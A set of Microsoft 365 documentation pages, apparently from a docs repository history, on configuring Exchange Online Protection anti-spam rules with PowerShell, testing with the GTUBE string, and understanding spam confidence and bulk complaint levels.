-> For detailed instructions to specify the quarantine policy to use in a spam filter policy, see [Use PowerShell to specify the quarantine policy in anti-spam policies](quarantine-policies.md#anti-spam-policies-in-powershell).
-
-### Use PowerShell to modify spam filter rules
-
-The only setting that isn't available when you modify a spam filter rule in PowerShell is the _Enabled_ parameter that allows you to create a disabled rule. To enable or disable existing spam filter rules, see the next section.
-
-Otherwise, no additional settings are available when you modify a spam filter rule in PowerShell. The same settings are available when you create a rule as described in the [Step 2: Use PowerShell to create a spam filter rule](#step-2-use-powershell-to-create-a-spam-filter-rule) section earlier in this article.
-
-To modify a spam filter rule, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use this syntax:
-
-```PowerShell
-Set-HostedContentFilterRule -Identity "<RuleName>" <Settings>
-```
-
-This example renames the existing spam filter rule named `{Fabrikam Spam Filter}`.
-
-```powershell
-Set-HostedContentFilterRule -Identity "{Fabrikam Spam Filter}" -Name "Fabrikam Spam Filter"
-```
-
-For detailed syntax and parameter information, see [Set-HostedContentFilterRule](/powershell/module/exchange/set-hostedcontentfilterrule).
-
-### Use PowerShell to enable or disable spam filter rules
-
-Enabling or disabling a spam filter rule in PowerShell enables or disables the whole anti-spam policy (the spam filter rule and the assigned spam filter policy). You can't enable or disable the default anti-spam policy (it's always applied to all recipients).
-
-To enable or disable a spam filter rule, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use this syntax:
-
-```PowerShell
-<Enable-HostedContentFilterRule | Disable-HostedContentFilterRule> -Identity "<RuleName>"
-```
-
-This example disables the spam filter rule named Marketing Department.
-
-```PowerShell
-Disable-HostedContentFilterRule -Identity "Marketing Department"
-```
-
-This example enables same rule.
-
-```PowerShell
-Enable-HostedContentFilterRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Enable-HostedContentFilterRule](/powershell/module/exchange/enable-hostedcontentfilterrule) and [Disable-HostedContentFilterRule](/powershell/module/exchange/disable-hostedcontentfilterrule).
-
-### Use PowerShell to set the priority of spam filter rules
-
-The highest priority value you can set on a rule is 0. The lowest value you can set depends on the number of rules. For example, if you have five rules, you can use the priority values 0 through 4. Changing the priority of an existing rule can have a cascading effect on other rules. For example, if you have five custom rules (priorities 0 through 4), and you change the priority of a rule to 2, the existing rule with priority 2 is changed to priority 3, and the rule with priority 3 is changed to priority 4.
-
-To set the priority of a spam filter rule, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use the following syntax:
-
-```PowerShell
-Set-HostedContentFilterRule -Identity "<RuleName>" -Priority <Number>
-```
-
-This example sets the priority of the rule named Marketing Department to 2. All existing rules that have a priority less than or equal to 2 are decreased by 1 (their priority numbers are increased by 1).
-
-```PowerShell
-Set-HostedContentFilterRule -Identity "Marketing Department" -Priority 2
-```
-
-> [!NOTE]
-> - To set the priority of a new rule when you create it, use the _Priority_ parameter on the **New-HostedContentFilterRule** cmdlet instead.
->
-> - The default spam filter policy doesn't have a corresponding spam filter rule, and it always has the unmodifiable priority value **Lowest**.
-
-### Use PowerShell to remove spam filter policies
-
-When you use PowerShell to remove a spam filter policy, the corresponding spam filter rule isn't removed.
-
-To remove a spam filter policy, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use this syntax:
-
-```PowerShell
-Remove-HostedContentFilterPolicy -Identity "<PolicyName>"
-```
-
-This example removes the spam filter policy named Marketing Department.
-
-```PowerShell
-Remove-HostedContentFilterPolicy -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-HostedContentFilterPolicy](/powershell/module/exchange/remove-hostedcontentfilterpolicy).
-
-### Use PowerShell to remove spam filter rules
-
-When you use PowerShell to remove a spam filter rule, the corresponding spam filter policy isn't removed.
-
-To remove a spam filter rule, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use this syntax:
-
-```PowerShell
-Remove-HostedContentFilterRule -Identity "<PolicyName>"
-```
-
-This example removes the spam filter rule named Marketing Department.
-
-```PowerShell
-Remove-HostedContentFilterRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-HostedContentFilterRule](/powershell/module/exchange/remove-hostedcontentfilterrule).
-
-## How do you know these procedures worked?
-
-### Send a GTUBE message to test your spam policy settings
-
-> [!NOTE]
-> These steps will only work if the email organization that you're sending the GTUBE message from doesn't scan for outbound spam. If it does, you can't send the test message.
-
-Generic Test for Unsolicited Bulk Email (GTUBE) is a text string that you include in a test message to verify your organization's anti-spam settings. A GTUBE message is similar to the European Institute for Computer Antivirus Research (EICAR) text file for testing malware settings.
-
-Include the following GTUBE text in an email message on a single line, without any spaces or line breaks:
-
-```console
-XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X
-```
security Anti Spam Protection About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-spam-protection-about.md
- Title: Anti-spam protection
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn about the anti-spam settings and filters that help prevent spam in Exchange Online Protection (EOP).
- Previously updated : 10/18/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Anti-spam protection in EOP
--
-> [!NOTE]
-> This topic is intended for admins. For end-user topics, see [Overview of the Junk Email Filter](https://support.microsoft.com/office/5ae3ea8e-cf41-4fa0-b02a-3b96e21de089) and [Learn about junk email and phishing](https://support.microsoft.com/office/86c1d76f-4d5a-4967-9647-35665dc17c31).
-
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, email messages are automatically protected against spam (junk email) by EOP.
-
-To help reduce junk email, EOP includes junk email protection that uses proprietary spam filtering (also known as _content filtering_) technologies to identify and separate junk email from legitimate email. EOP spam filtering learns from known spam and phishing threats and user feedback from our consumer platform, Outlook.com. Ongoing feedback from [admins](submissions-admin.md) and [users](submissions-outlook-report-messages.md) helps ensure that the EOP technologies are continually trained and improved.
-
-EOP uses the following spam filtering verdicts to classify messages:
--- **Spam**: The message received a [spam-confidence level (SCL)](anti-spam-spam-confidence-level-scl-about.md) of 5 or 6.-- **High confidence spam**: The message received an SCL of 7, 8, or 9.-- **Phishing**-- **High confidence phishing**: As part of [secure by default](secure-by-default.md), messages that are identified as high confidence phishing are always quarantined, and users can't release their own quarantined high confidence phishing messages, regardless of any available settings that admins configure.-- **Bulk**: The message source met or exceeded the configured [bulk complaint level (BCL)](anti-spam-bulk-complaint-level-bcl-about.md). threshold.-
-For more information about anti-spam protection, see the [Anti-spam protection FAQ](anti-spam-protection-faq.yml)
-
-In the default anti-spam policy and in custom anti-spam policies, you can configure the actions to take based on these verdicts. In the Standard and Strict [preset security policies](preset-security-policies.md), the actions are already configured and unmodifiable as described in [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).
-
-To configure the default anti-spam policy, and to create, modify, and remove custom anti-spam policies, see [Configure anti-spam policies in Microsoft 365](anti-spam-policies-configure.md).
-
-> [!TIP]
-> If you disagree with the spam filtering verdict, you can report the message to Microsoft as a false positive (good mail marked as bad) or a false negative (bad email allowed). For more information, see:
->
-> - [How do I report a suspicious email or file to Microsoft?](submissions-report-messages-files-to-microsoft.md).
-> - [How to handle legitimate emails getting blocked (false positive), using Microsoft Defender for Office 365](step-by-step-guides/how-to-handle-false-positives-in-microsoft-defender-for-office-365.md)
-> - [How to handle malicious emails that are delivered to recipients (false negatives), using Microsoft Defender for Office 365](step-by-step-guides/how-to-handle-false-negatives-in-microsoft-defender-for-office-365.md)
->
-> The anti-spam message headers can tell you why a message was marked as spam, or why it skipped spam filtering. For more information, see [Anti-spam message headers](message-headers-eop-mdo.md).
->
-> You can't completely turn off spam filtering in Microsoft 365, but you can use Exchange mail flow rules (also known as transport rules) to bypass most spam filtering on incoming messages (for example, if you route email through a third-party protection service or device before delivery to Microsoft 365). For more information, see [Use mail flow rules to set the spam confidence level (SCL) in messages](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-set-scl).
->
-> - High confidence phishing messages are still filtered. Other features in EOP aren't affected (for example, messages are always scanned for malware).
-> - If you need to bypass spam filtering for SecOps mailboxes or phishing simulations, don't use mail flow rules. For more information, see [Configure the delivery of third-party phishing simulations to users and unfiltered messages to SecOps mailboxes](advanced-delivery-policy-configure.md).
->
-> In hybrid environments where EOP protects on-premises Exchange mailboxes, you need to configure two mail flow rules (also known as transport rules) in your on-premises Exchange organization to recognize the EOP spam headers that are added to messages. For details, see [Configure EOP to deliver spam to the Junk Email folder in hybrid environments](/exchange/standalone-eop/configure-eop-spam-protection-hybrid).
-
-## Anti-spam policies
-
-Anti-spam policies control the configurable settings for spam filtering. The important settings in anti-spam policies are described in the following subsections.
-
-> [!TIP]
-> To see the anti-spam policy settings in the default policy, the Standard preset security policy, and the Strict preset security policy, see [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).
-
-### Recipient filters in anti-spam policies
-
-Recipient filters use conditions and exceptions to identify the internal recipients that the policy applies to. At least one condition is required in custom policies. Conditions and exceptions aren't available in the default policy (the default policy applies to all recipients). You can use the following recipient filters for conditions and exceptions:
--- **Users**: One or more mailboxes, mail users, or mail contacts in the organization.-- **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
-- **Domains**: One or more of the configured [accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in Microsoft 365. The recipient's primary email address is in the specified domain.-
-You can use a condition or exception only once, but the condition or exception can contain multiple values:
--- Multiple **values** of the **same condition or exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_):
- - **Conditions**: If the recipient matches **any** of the specified values, the policy is applied to them.
- - **Exceptions**: If the recipient matches **any** of the specified values, the policy isn't applied to them.
--- Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.--- Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
-### Bulk complaint threshold (BCL) in anti-spam policies
-
-EOP assigns a bulk complaint level (BCL) value to inbound messages from bulk senders. Messages from bulk senders are also known as _bulk mail_ or _gray mail_.
-
-For more information about BCL, see [Bulk complaint level (BCL) in EOP](anti-spam-bulk-complaint-level-bcl-about.md).
-
-> [!TIP]
-> By default, the PowerShell only setting _MarkAsSpamBulkMail_ is `On` in anti-spam policies in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). This setting dramatically affects the results of a **Bulk compliant level (BCL) met or exceeded** filtering verdict:
->
-> - **_MarkAsSpamBulkMail_ is On**: A BCL that's greater than or equal to the threshold value is converted to an SCL 6 that corresponds to a filtering verdict of **Spam**, and the action for the **Bulk compliant level (BCL) met or exceeded** filtering verdict is taken on the message.
-> - **_MarkAsSpamBulkMail_ is Off**: The message is stamped with the BCL, but _no action_ is taken for a **Bulk compliant level (BCL) met or exceeded** filtering verdict. In effect, the BCL threshold and **Bulk compliant level (BCL) met or exceeded** filtering verdict action are irrelevant.
-
-### Spam properties in anti-spam policies
-
-The **Test mode** settings, the **Increase spam score** settings, and most of the **Mark as spam** settings are part of Advanced Spam Filtering (ASF) in anti-spam policies.
-
-These settings aren't configured in the default anti-spam policy by default, or in the Standard or Strict [preset security policies](preset-security-policies.md).
-
-For complete information about ASF settings, see [Advanced Spam Filter (ASF) settings in EOP](anti-spam-policies-asf-settings-about.md).
-
-The other settings that are available in this category are:
--- **Contains specific languages**: Messages in the specified languages are automatically identified as spam.-- **From these countries***: Messages from the specified countries are automatically identified as spam.-
-These settings aren't configured in the default anti-spam policy by default, or in the Standard or Strict [preset security policies](preset-security-policies.md).
-
-### Actions in anti-spam policies
--- In custom anti-spam policies and the default anti-spam policy, the available actions for spam filtering verdicts are described in the following table.
- - A check mark ( Γ£ö ) indicates the action is available (not all actions are available for all verdicts).
- - An asterisk ( <sup>\*</sup> ) after the check mark indicates the default action for the spam filtering verdict.
-
- |Action|Spam|High<br>confidence<br>spam|Phishing|High<br>confidence<br>phishing|Bulk|
- ||::|::|::|::|::|
- |**Move message to Junk Email folder**: The message is delivered to the mailbox and moved to the Junk Email folder.┬╣|Γ£ö<sup>\*</sup>|Γ£ö<sup>\*</sup>|Γ£ö|┬▓|Γ£ö<sup>\*</sup>|
- |**Add X-header**: Adds an X-header to the message header and delivers the message to the mailbox. <br/><br/> You enter the X-header field name (not the value) in the available **Add this X-header text** box. <br/><br/> For **Spam** and **High confidence spam** verdicts, the message is moved to the Junk Email folder.┬╣ ┬│|Γ£ö|Γ£ö|Γ£ö||Γ£ö|
- |**Prepend subject line with text**: Adds text to the beginning of the message's subject line. The message is delivered to the mailbox and moved to the Junk email folder.┬╣ ┬│ <br/><br/> You enter the text in the available **Prefix subject line with this text** box.|Γ£ö|Γ£ö|Γ£ö||Γ£ö|
- |**Redirect message to email address**: Sends the message to other recipients instead of the intended recipients. <br/><br/> You specify the recipients in the **Redirect to this email address** box.|Γ£ö|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Delete message**: Silently deletes the entire message, including all attachments.|Γ£ö|Γ£ö|Γ£ö||Γ£ö|
- |**Quarantine message**: Sends the message to quarantine instead of the intended recipients. <br/><br/> You select or use the default _quarantine policy_ for the spam filtering verdict in the **Select quarantine policy** box that appears.⁴ Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy). <br/><br/> You specify how long the messages are held in quarantine in the available **Retain spam in quarantine for this many days** box.|✔|✔|✔<sup>\*</sup>|✔<sup>\*</sup> ⁵|✔|
- |**No action**|||||Γ£ö|
-
- ┬╣ EOP uses its own mail flow delivery agent to route messages to the Junk Email folder instead of using the junk email rule in the mailbox. The _Enabled_ parameter on the **Set-MailboxJunkEmailConfiguration** cmdlet in Exchange Online PowerShell has effect on mail flow in cloud mailboxes. For more information, see [Configure junk email settings on Exchange Online mailboxes](configure-junk-email-settings-on-exo-mailboxes.md).
-
- ┬▓ For **High confidence phishing**, the **Move message to Junk Email folder** action is effectively deprecated. Although you might be able to select the **Move message to Junk Email folder** action, high confidence phishing messages are always quarantined (equivalent to selecting **Quarantine message**).
-
- ┬│ You can this use value as a condition in mail flow rules to filter or route the message.
-
- ⁴ If the spam filtering verdict quarantines messages by default (**Quarantine message** is already selected when you get to the page), the default quarantine policy name is shown in the **Select quarantine policy** box. If you _change_ the action of a spam filtering verdict to **Quarantine message**, the **Select quarantine policy** box is blank by default. A blank value means the default quarantine policy for that verdict is used. When you later view or edit the anti-spam policy settings, the quarantine policy name is shown. For more information about the quarantine policies that are used by default for spam filter verdicts, see [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).
-
- ⁵ Users can't release their own messages that were quarantined as high confidence phishing, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined high confidence phishing messages.
--- **Intra-Organizational messages to take action on**: Controls whether spam filtering and the corresponding verdict actions are applied to internal messages (messages sent between users within the organization). The action that's configured in the policy for the specified spam filter verdicts is taken on messages sent between internal users. The available values are:
- - **Default**: This is the default value. This value is the same as selecting **High confidence phishing messages**.
- - **None**
- - **High confidence phishing messages**
- - **Phishing and high confidence phishing messages**
- - **All phishing and high confidence spam messages**
- - **All phishing and spam messages**
-
- For the default values that are used in the default anti-spam policy and in the Standard and Strict preset security policies, see the **Intra-Organizational messages to take action on** entry in [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).
--- **Retain spam in quarantine for this many days**: Specifies how long to keep the message in quarantine if you selected **Quarantine message** as the action for a spam filtering verdict. After the time period expires, the message is deleted, and isn't recoverable. A valid value is from 1 to 30 days.-
- For the default values that are used in the default anti-spam policy and in the Standard and Strict preset security policies, see the **Retain spam in quarantine for this many days** entry in [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).
-
- > [!TIP]
- > This setting also controls how long messages that were quarantined by **anti-phishing** policies are retained. For more information, see [Quarantine retention](quarantine-about.md#quarantine-retention).
-
-#### Zero-hour auto purge (ZAP) in anti-spam policies
-
-ZAP for phishing and ZAP for spam is able to act on messages _after_ they're delivered to Exchange Online mailboxes. By default, ZAP for phishing and ZAP for spam are turned on, and we recommend that you leave them on. For more information, see:
--- [Zero-hour auto purge (ZAP) for phishing](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-phishing)-- [Zero-hour auto purge (ZAP) for high confidence phishing](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-high-confidence-phishing)-- [Zero-hour auto purge (ZAP) for spam](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-spam)-
-#### Quarantine policies in anti-spam policies
-
-If the verdict in the anti-spam policy is configured to quarantines messages, quarantine policies define what users are able to do to those quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-### Allow and block lists in anti-spam policies
-
-Anti-spam policies contain the following lists to allow or block specific senders or domains:
--- The allowed senders list-- The allowed domains list-- The blocked senders list-- The blocked domains list-
-These settings aren't configured in the default anti-spam policy by default, or in the Standard or Strict [preset security policies](preset-security-policies.md).
-
-The functionality of these lists has been largely replaced by:
--- Block entries for domains and email addresses in the [Create block entries for domains and email addresses](tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-domains-and-email-addresses).-
- The main reason to use the blocked senders list or the blocked domains list in anti-spam policies: block entries in the Tenant Allow/Block List also prevent users in the organization from _sending_ email to those email addresses or domains.
--- Reporting good email to Microsoft [from the Submissions page in the Microsoft Defender portal](submissions-admin.md#report-good-email-to-microsoft) (where you can elect to **Allow emails with similar attributes**, which creates the required temporary entries in the Tenant Allow/Block List).-
- > [!IMPORTANT]
- > Messages from entries in the allowed senders list or the allowed domains list bypass most email protection (except malware and high confidence phishing) and [email authentication](email-authentication-about.md) checks (SPF, DKIM and DMARC). Entries in the allowed senders list or the allowed domains list create a high risk of attackers successfully delivering email to the Inbox that would otherwise be filtered. These lists are best used for temporary testing only.
- >
- > Never add common domains (for example, microsoft.com or office.com) to the allowed domains list. Attackers can easily send spoofed messages from these common domains into your organization.
- >
- > As of September 2022, if an allowed sender, domain, or subdomain is in an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in your organization, that sender, domain, or subdomain must pass email authentication checks in order to skip spam filtering.
- >
- > If you're going to keep an allowed domain entry in the list for an extended period of time, tell the sender to verify that their SPF record is up to date with email sources for their domain, and that the policy in their DMARC record is set to `p=reject`.
-
-### Priority of anti-spam policies
-
-If they're [turned on](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users), the Standard and Strict preset security policies are applied before any custom anti-spam policies or the default policy (Strict is always first). If you create multiple custom anti-spam policies, you can specify the order that they're applied. Policy processing stops after the first policy is applied (the highest priority policy for that recipient).
-
-For more information about the order of precedence and how multiple policies are evaluated, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md) and [Order of precedence for preset security policies and other policies](preset-security-policies.md#order-of-precedence-for-preset-security-policies-and-other-policies).
-
-## Default anti-spam policy
-
-Every organization has a built-in anti-spam policy named Default that has the following properties:
--- The policy is the default policy (the **IsDefault** property has the value `True`), and you can't delete the default policy.-- The policy is automatically applied to all recipients in the organization, and you can't turn it off.-- The policy is always applied last (the **Priority** value is **Lowest** and you can't change it).
security Anti Spam Spam Confidence Level Scl About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-spam-spam-confidence-level-scl-about.md
- Title: Spam confidence level
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn about the spam confidence level (SCL) that applied to messages in Exchange Online Protection (EOP).
- Previously updated : 11/3/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Spam confidence level (SCL) in EOP
-
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, inbound messages go through spam filtering in EOP and are assigned a spam score. That score is mapped to an individual spam confidence level (SCL) value that's added to the message in an X-header. A higher SCL value indicates a message is more likely to be spam. EOP takes action on the message based on the SCL value.
-
-The following table describes what the SCL values mean and the default action that's taken on those messages:
-
-|SCL value|Definition|Default action|
-|::|||
-|-1|The message skipped spam filtering. For example, the message is from a safe sender, was sent to a safe recipient, or is from an email source server on the IP Allow List. For more information, see [Create safe sender lists in EOP](create-safe-sender-lists-in-office-365.md).|Deliver the message to recipient Inbox folders.|
-|0, 1|Spam filtering determined the message wasn't spam.|Deliver the message to recipient Inbox folders.|
-|5, 6|Spam filtering marked the message as **Spam**|**Default anti-spam policy, new anti-spam policies, and [Standard preset security policy](preset-security-policies.md)**: Deliver the message to recipient Junk Email folders. <br/><br/> **Strict preset security policy**: [Quarantine the message](quarantine-end-user.md).|
-|7, 8, 9|Spam filtering marked the message as **High confidence spam**|**Default anti-spam policy and new anti-spam policies**: Deliver the message to recipient Junk Email folders. <br/><br/> **Standard and Strict preset security policies**: [Quarantine the message](quarantine-end-user.md).|
-
-> [!TIP]
-> Spam filtering never stamps messages with the SCL values 2, 3, or 4.
->
-> Typically, spam filtering itself doesn't stamp messages with the SCL value 7, but other features might. For example:
->
-> - Human message grading by an analyst.
-> - DMARC failures.
-> - [Mail flow rules (also known as transport rules)](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-set-scl).
-
-For more information about actions you can take on messages based on the spam filtering verdict, see [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).
-
-Similar to the SCL, the bulk complaint level (BCL) identifies bad bulk email (also known as _gray mail_). A higher BCL value indicates the message is more likely to exhibit undesirable spam-like behavior. You configure the BCL threshold in anti-spam policies. For more information, see [Configure anti-spam policies in EOP](anti-spam-policies-configure.md), [Bulk complaint level (BCL) in EOP](anti-spam-bulk-complaint-level-bcl-about.md), and [What's the difference between junk email and bulk email?](anti-spam-spam-vs-bulk-about.md).
-
-****
-
security Anti Spam Spam Vs Bulk About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-spam-spam-vs-bulk-about.md
- Title: What's the difference between junk email and bulk email?
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn about the differences between junk email (spam) and bulk email (gray mail) in Exchange Online Protection (EOP).
- Previously updated : 3/22/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# What's the difference between junk email and bulk email in EOP?
-
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, customers sometimes ask: "What's the difference between junk email and bulk email?" This article explains the difference and describes the controls that are available in EOP.
--- **Junk email** is spam, which is an unsolicited and universally unwanted message (when identified correctly). EOP rejects spam based on the reputation of the source email server. If a message passes source IP inspection, it continues through spam filtering. If the message is classified as **Spam** or **High confidence spam** by spam filtering, what happens to the message depends on the verdict and the anti-spam policy that detected the message.-
- For the default actions that are taken on spam and high confidence spam messages in the default anti-spam policy and in the Standard and Strict [preset security policies](preset-security-policies.md), see the **Spam** and **High confidence spam** entries in [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).
-
- In the default anti-spam policy and in custom anti-spam policies, you can configure the action to take on spam filtering verdicts. For instructions, see [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).
-
- If you disagree with the spam filtering verdict, you can report messages as spam or good to Microsoft in several ways, as described in [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).
--- **Bulk email** (also known as _gray mail_), is more difficult to classify. Whereas spam is a constant threat, bulk email is often one-time advertisements or marketing messages. Some users want bulk email messages (and in fact, they have deliberately signed up to receive them), while other users consider bulk email to be spam. For example, some users want to receive advertising messages from the Contoso Corporation or invitations to an upcoming conference on cybersecurity, while other users consider these same messages to be spam.-
- For more information about how bulk email is identified, see [Bulk complaint level (BCL) in EOP](anti-spam-bulk-complaint-level-bcl-about.md).
-
-## How to manage bulk email
-
-Because of the mixed reaction to bulk email, there isn't universal guidance that applies to every organization.
-
-Anti-spam policies have a default BCL threshold that's used to identify bulk email as spam, and a specific action to take on those bulk messages. For more information, see the following articles:
--- [Bulk complaint level (BCL) in EOP](anti-spam-bulk-complaint-level-bcl-about.md)-- [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).-- [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings)-
-Another option that's easy to overlook: if a user complains about receiving bulk email, but the messages are from reputable senders that pass spam filtering in EOP, have the user check for an unsubscribe option in the bulk email message.
-
-## How to tune bulk email
-
-As of September 2022, Microsoft Defender for Office 365 Plan 2 customers can access BCL from [advanced hunting](/microsoft-365/security/defender/advanced-hunting-overview). This feature allows admins to look at all bulk senders who sent mail to their organization, their corresponding BCL values, and the amount of email that was received. You can drill down into the bulk senders by using other columns in **EmailEvents** table in the **Email & collaboration** schema. For more information, see [EmailEvents](/microsoft-365/security/defender/advanced-hunting-emailevents-table).
-
-For example, if Contoso has set their current bulk threshold to 7 in anti-spam policies, Contoso recipients receive email from all senders in their Inbox if the BCL value is 6 or less. Admins can run the following query to get a list of all bulk senders in the organization:
-
-```console
-EmailEvents
-| where BulkComplaintLevel >= 1 and Timestamp > datetime(2022-09-XXT00:00:00Z)
-| summarize count() by SenderMailFromAddress, BulkComplaintLevel
-```
-
-This query allows admins to identify wanted and unwanted senders. If a bulk sender has a BCL score that's more than the bulk threshold, admins can [report the sender's messages to Microsoft for analysis](submissions-admin.md#report-good-email-to-microsoft). This action also adds the sender as an allow entry in the Tenant Allow/Block List.
-
-Organizations without Defender for Office 365 Plan 2 can try the features in Microsoft Defender XDR for Office 365 Plan 2 for free. Use the 90-day Defender for Office 365 evaluation at <https://security.microsoft.com/atpEvaluation>. Learn about who can sign up and trial terms [here](try-microsoft-defender-for-office-365.md).
-
-If you have Defender for Office 365 Plan 1 or Plan 2, you can use the [Threat protection status report](reports-email-security.md#threat-protection-status-report) to identify wanted and unwanted bulk senders:
-
-1. Open the **Threat protection status** report at one of the following URLs:
- - **EOP**: <https://security.microsoft.com/reports/TPSAggregateReport>
- - **Defender for Office 365**: <https://security.microsoft.com/reports/TPSAggregateReportATP>
-
-2. Select **View data by Email \> Spam** and **Chart breakdown by Detection Technology**.
-
-3. Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. In the **Filters** flyout that opens, select only **Bulk** in the **Detection** section.
-
- Use the **Bulk complaint level** slider to filter the bulk detections by BCL value.
-
- When you're finished in the **Filters** flyout, select **Apply**.
-
-4. Back on the **Threat protection status** page, select one of the bulk messages from the details table below the chart by clicking anywhere in the row other than the check box next to the first column.
-
- In the message details flyout that opens, select :::image type="icon" source="../../medi).
-
-5. After you identify wanted and unwanted bulk senders, adjust the bulk threshold in the default anti-spam policy and in custom anti-spam policies. If some bulk senders don't fit within your bulk threshold, [report the messages to Microsoft for analysis](submissions-admin.md#report-good-email-to-microsoft).
-
-Admins can follow the [recommended bulk threshold values](recommended-settings-for-eop-and-office365.md#anti-spam-anti-malware-and-anti-phishing-protection-in-eop) or choose a bulk threshold value that suits the needs of their organization.
security Anti Spoofing Spoof Intelligence https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-spoofing-spoof-intelligence.md
- Title: Spoof intelligence insight
- - NOCSH
----
- - MOE150
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn about the spoof intelligence insight in Exchange Online Protection (EOP).
- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
